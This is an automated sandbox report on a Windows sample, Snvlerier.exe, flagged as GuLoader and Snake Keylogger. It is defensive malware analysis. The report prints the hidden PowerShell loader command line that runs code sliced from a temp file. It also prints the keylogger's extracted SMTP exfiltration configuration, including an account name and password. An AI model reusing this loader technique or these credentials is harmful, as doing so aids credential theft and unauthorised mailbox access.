Edit tour
Windows
Analysis Report
Snvlerier.exe
Overview
General Information
| Sample name: | Snvlerier.exe |
| Analysis ID: | 1532989 |
| MD5: | 9970463edf086976996f0bc196fcfc60 |
| SHA1: | 22f3132f1456dba3bcc7096d2c10c5635ee08828 |
| SHA256: | 6e0230eac8eeadd5214b6d83cc2f470933bee1c4261a607e182a093af14b62cb |
| Infos: |   |
 | |
Detection
GuLoader, Snake Keylogger
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Classification
- System is w10x64
Snvlerier.exe (PID: 7272 cmdline:
"C:\Users\ user\Deskt op\Snvleri er.exe" MD5: 9970463EDF086976996F0BC196FCFC60) 
powershell.exe (PID: 7300 cmdline: "powershel l.exe" -wi ndowstyle hidden "$D ictyocerat ine=Get-Co ntent -raw 'C:\Users \user\AppD ata\Local\ Temp\carin al\Coracos teon\Efter mles.Tra'; $Ciceronia n=$Dictyoc eratine.Su bString(53 398,3);.$C iceronian( $Dictyocer atine)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 7308 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
msiexec.exe (PID: 7824 cmdline: "C:\Window s\SysWOW64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| 404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-14T09:12:13.508895+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 188.114.96.3 | 443 | TCP |
| 2024-10-14T09:12:14.647364+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49768 | 188.114.96.3 | 443 | TCP |
| 2024-10-14T09:12:16.929136+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49783 | 188.114.96.3 | 443 | TCP |
| 2024-10-14T09:12:19.118410+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49802 | 188.114.96.3 | 443 | TCP |
| 2024-10-14T09:12:21.359711+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49821 | 188.114.96.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-14T09:12:11.601627+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49744 | 193.122.130.0 | 80 | TCP |
| 2024-10-14T09:12:12.929762+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49744 | 193.122.130.0 | 80 | TCP |
| 2024-10-14T09:12:14.070380+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49762 | 193.122.130.0 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Malware Configuration Extractor: | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Integrated Neural Analysis Model: | ||
Location Tracking | |
|---|
| Source: | DNS query: | ||
| Source: | Static PE information: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 0_2_00405FF1 | |
| Source: | Code function: | 0_2_0040264F | |
| Source: | Code function: | 0_2_004055CA | |
| Source: | Code function: | 6_2_02ACF2C0 | |
| Source: | Code function: | 6_2_02ACF4AC | |
| Source: | Code function: | 6_2_02ACF961 | |
| Source: | Code function: | 6_2_23AACCA0 | |
| Source: | Code function: | 6_2_23AAF3B8 | |
| Source: | Code function: | 6_2_23AA0B30 | |
| Source: | Code function: | 6_2_23AA0B30 | |
| Source: | Code function: | 6_2_23AAEB08 | |
| Source: | Code function: | 6_2_23AAEF60 | |
| Source: | Code function: | 6_2_23AAE6B0 | |
| Source: | Code function: | 6_2_23AADE00 | |
| Source: | Code function: | 6_2_23AA0673 | |
| Source: | Code function: | 6_2_23AAE258 | |
| Source: | Code function: | 6_2_23AAD9A8 | |
| Source: | Code function: | 6_2_23AA2DBB | |
| Source: | Code function: | 6_2_23AA2DC8 | |
| Source: | Code function: | 6_2_23AA310E | |
| Source: | Code function: | 6_2_23AA2968 | |
| Source: | Code function: | 6_2_23AAD550 | |
| Source: | Code function: | 6_2_23AAD0F8 | |
| Source: | Code function: | 6_2_23AAF810 | |
| Source: | Code function: | 6_2_23AA0040 | |
| Source: | Code function: | 6_2_23AA0853 | |
Networking | |
|---|
| Source: | DNS query: | ||
| Source: | TCP traffic: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | ASN Name: | ||
| Source: | ASN Name: | ||
| Source: | ASN Name: | ||
| Source: | JA3 fingerprint: | ||
| Source: | JA3 fingerprint: | ||
| Source: | JA3 fingerprint: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | TCP traffic: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Code function: | 0_2_00405138 | |
System Summary | |
|---|
| Source: | File created: | Jump to dropped file | ||
| Source: | Code function: | 0_2_0040324D | |
| Source: | File created: | Jump to behavior | ||
| Source: | Code function: | 0_2_00404977 | |
| Source: | Code function: | 0_2_004062C7 | |
| Source: | Code function: | 1_2_0087DFE0 | |
| Source: | Code function: | 6_2_02ACD278 | |
| Source: | Code function: | 6_2_02AC5362 | |
| Source: | Code function: | 6_2_02ACC146 | |
| Source: | Code function: | 6_2_02ACC738 | |
| Source: | Code function: | 6_2_02ACC468 | |
| Source: | Code function: | 6_2_02ACCA08 | |
| Source: | Code function: | 6_2_02ACE988 | |
| Source: | Code function: | 6_2_02AC3E09 | |
| Source: | Code function: | 6_2_02ACCFAA | |
| Source: | Code function: | 6_2_02ACCCD8 | |
| Source: | Code function: | 6_2_02AC7118 | |
| Source: | Code function: | 6_2_02AC3A91 | |
| Source: | Code function: | 6_2_02AC29EC | |
| Source: | Code function: | 6_2_02ACF961 | |
| Source: | Code function: | 6_2_02ACE97A | |
| Source: | Code function: | 6_2_02AC9DE0 | |
| Source: | Code function: | 6_2_23AA9548 | |
| Source: | Code function: | 6_2_23AACCA0 | |
| Source: | Code function: | 6_2_23AAFC68 | |
| Source: | Code function: | 6_2_23AA9C70 | |
| Source: | Code function: | 6_2_23AAF3A8 | |
| Source: | Code function: | 6_2_23AA8BA0 | |
| Source: | Code function: | 6_2_23AA17A0 | |
| Source: | Code function: | 6_2_23AAF3B8 | |
| Source: | Code function: | 6_2_23AA178F | |
| Source: | Code function: | 6_2_23AA8B91 | |
| Source: | Code function: | 6_2_23AA9BF8 | |
| Source: | Code function: | 6_2_23AA9328 | |
| Source: | Code function: | 6_2_23AA0B20 | |
| Source: | Code function: | 6_2_23AA0B30 | |
| Source: | Code function: | 6_2_23AAEB08 | |
| Source: | Code function: | 6_2_23AAEF60 | |
| Source: | Code function: | 6_2_23AAEF51 | |
| Source: | Code function: | 6_2_23AAE6A0 | |
| Source: | Code function: | 6_2_23AAE6B0 | |
| Source: | Code function: | 6_2_23AA1E80 | |
| Source: | Code function: | 6_2_23AAEAF8 | |
| Source: | Code function: | 6_2_23AADE00 | |
| Source: | Code function: | 6_2_23AA1E70 | |
| Source: | Code function: | 6_2_23AAE258 | |
| Source: | Code function: | 6_2_23AAE257 | |
| Source: | Code function: | 6_2_23AAD9A8 | |
| Source: | Code function: | 6_2_23AAD999 | |
| Source: | Code function: | 6_2_23AADDF1 | |
| Source: | Code function: | 6_2_23AA2968 | |
| Source: | Code function: | 6_2_23AAD540 | |
| Source: | Code function: | 6_2_23AA295B | |
| Source: | Code function: | 6_2_23AAD550 | |
| Source: | Code function: | 6_2_23AACC8F | |
| Source: | Code function: | 6_2_23AAD0E9 | |
| Source: | Code function: | 6_2_23AAD0F8 | |
| Source: | Code function: | 6_2_23AA5028 | |
| Source: | Code function: | 6_2_23AA003F | |
| Source: | Code function: | 6_2_23AAF802 | |
| Source: | Code function: | 6_2_23AA0007 | |
| Source: | Code function: | 6_2_23AA5018 | |
| Source: | Code function: | 6_2_23AAF810 | |
| Source: | Code function: | 6_2_23AA0040 | |
| Source: | Code function: | 6_2_23AAFC5E | |
| Source: | Static PE information: | ||
| Source: | Classification label: | ||
| Source: | Code function: | 0_2_0040443B | |
| Source: | Code function: | 0_2_00402036 | |
| Source: | File created: | Jump to behavior | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | WMI Queries: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Virustotal: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Static file information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
Data Obfuscation | |
|---|
| Source: | File source: | ||
| Source: | Anti Malware Scan Interface: | ||
| Source: | Anti Malware Scan Interface: | ||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Code function: | 0_2_00406018 | |
| Source: | Code function: | 1_2_0087CE94 | |
| Source: | Code function: | 1_2_0087CE94 | |
| Source: | Code function: | 1_2_0087D571 | |
| Source: | Code function: | 1_2_088F9449 | |
| Source: | Code function: | 1_2_088FF481 | |
| Source: | Code function: | 1_2_088FEE85 | |
| Source: | Code function: | 1_2_088FD990 | |
| Source: | Code function: | 1_2_088FD7AA | |
| Source: | Code function: | 1_2_088FDDF1 | |
| Source: | Code function: | 1_2_088FF481 | |
| Source: | Code function: | 1_2_088FCBEE | |
| Source: | Code function: | 1_2_088FDDF1 | |
| Source: | Code function: | 6_2_03D6CBEE | |
| Source: | Code function: | 6_2_03D6D7AA | |
| Source: | Code function: | 6_2_03D6D990 | |
| Source: | Code function: | 6_2_03D6F481 | |
| Source: | Code function: | 6_2_03D6DDF1 | |
| Source: | Code function: | 6_2_03D6DDF1 | |
| Source: | Code function: | 6_2_03D6F481 | |
| Source: | Code function: | 6_2_03D69449 | |
| Source: | Code function: | 6_2_03D6EE85 | |
| Source: | File created: | Jump to dropped file | ||
Hooking and other Techniques for Hiding and Protection | |
|---|
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
